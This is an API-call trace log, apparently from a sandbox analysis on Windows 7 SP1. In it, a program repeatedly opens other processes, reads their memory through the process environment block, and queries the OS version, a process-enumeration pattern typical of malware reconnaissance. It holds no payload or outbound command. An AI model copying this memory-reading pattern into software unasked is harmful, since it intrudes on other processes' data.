[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a26f2, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.331] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.332] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.332] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.332] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.333] malloc (_Size=0x76) returned 0x2c1300
[0412.333] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2760, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.333] free (_Block=0x2c1300)
[0412.334] CloseHandle (hObject=0x24c) returned 1
[0412.335] _ui64tow (_Value=0x9b8, _Buffer="2480", _Radix=10) returned="2488"
[0412.339] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2488") returned 4
[0412.343] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.343] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x24c
[0412.375] GetLastError () returned 0x0
[0412.376] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a26f0, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.377] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.378] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] malloc (_Size=0x76) returned 0x2c1300
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a275e, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] free (_Block=0x2c1300)
[0412.380] CloseHandle (hObject=0x24c) returned 1
[0412.381] _ui64tow (_Value=0x9dc, _Buffer="2488", _Radix=10) returned="2524"
[0412.385] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2524") returned 4
[0412.386] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.386] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x24c
[0412.410] GetLastError () returned 0x0
[0412.410] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.410] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.410] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.411] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.411] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b26e8, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.412] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.413] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.415] malloc (_Size=0x76) returned 0x2c1300
[0412.415] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b2756, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.415] free (_Block=0x2c1300)
[0412.416] CloseHandle (hObject=0x24c) returned 1
[0412.417] _ui64tow (_Value=0x9e8, _Buffer="2524", _Radix=10) returned="2536"
[0412.421] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2536") returned 4
[0412.422] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.422] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x24c
[0412.443] GetLastError () returned 0x0
[0412.444] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226f2, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.449] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.450] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] malloc (_Size=0x78) returned 0x2c1300
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622762, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] free (_Block=0x2c1300)
[0412.452] CloseHandle (hObject=0x24c) returned 1
[0412.453] _ui64tow (_Value=0x9f4, _Buffer="2536", _Radix=10) returned="2548"
[0412.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2548") returned 4
[0412.459] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.459] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x24c
[0412.482] GetLastError () returned 0x0
[0412.482] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.484] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.485] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.485] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] malloc (_Size=0x6e) returned 0x2c1680
[0412.486] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x46274c, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] free (_Block=0x2c1680)
[0412.487] CloseHandle (hObject=0x24c) returned 1
[0412.487] _ui64tow (_Value=0xa00, _Buffer="2548", _Radix=10) returned="2560"
[0412.492] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2560") returned 4
[0412.494] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.494] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.515] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x24c
[0412.515] GetLastError () returned 0x0
[0412.515] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.515] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e26fc, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.517] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.518] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.518] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] malloc (_Size=0x7c) returned 0x2e3b90
[0412.519] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2770, lpBuffer=0x2e3b90, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] free (_Block=0x2e3b90)
[0412.520] CloseHandle (hObject=0x24c) returned 1
[0412.521] _ui64tow (_Value=0xa0c, _Buffer="2560", _Radix=10) returned="2572"
[0412.526] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2572") returned 4
[0412.527] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.527] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.550] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x24c
[0412.550] GetLastError () returned 0x0
[0412.550] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.550] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26ea, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.552] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.553] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.553] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.553] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.557] malloc (_Size=0x7a) returned 0x2e3a70
[0412.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b275c, lpBuffer=0x2e3a70, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0412.557] free (_Block=0x2e3a70)
[0412.558] CloseHandle (hObject=0x24c) returned 1
[0412.559] _ui64tow (_Value=0xa18, _Buffer="2572", _Radix=10) returned="2584"
[0412.563] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2584") returned 4
[0412.564] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.565] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x24c
[0412.589] GetLastError () returned 0x0
[0412.590] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.591] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.592] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.592] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.592] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.593] malloc (_Size=0x72) returned 0x2c1680
[0412.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462750, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.593] free (_Block=0x2c1680)
[0412.594] CloseHandle (hObject=0x24c) returned 1
[0412.595] _ui64tow (_Value=0xa24, _Buffer="2584", _Radix=10) returned="2596"
[0412.599] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2596") returned 4
[0412.600] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.600] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.626] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x24c
[0412.626] GetLastError () returned 0x0
[0412.626] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.626] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
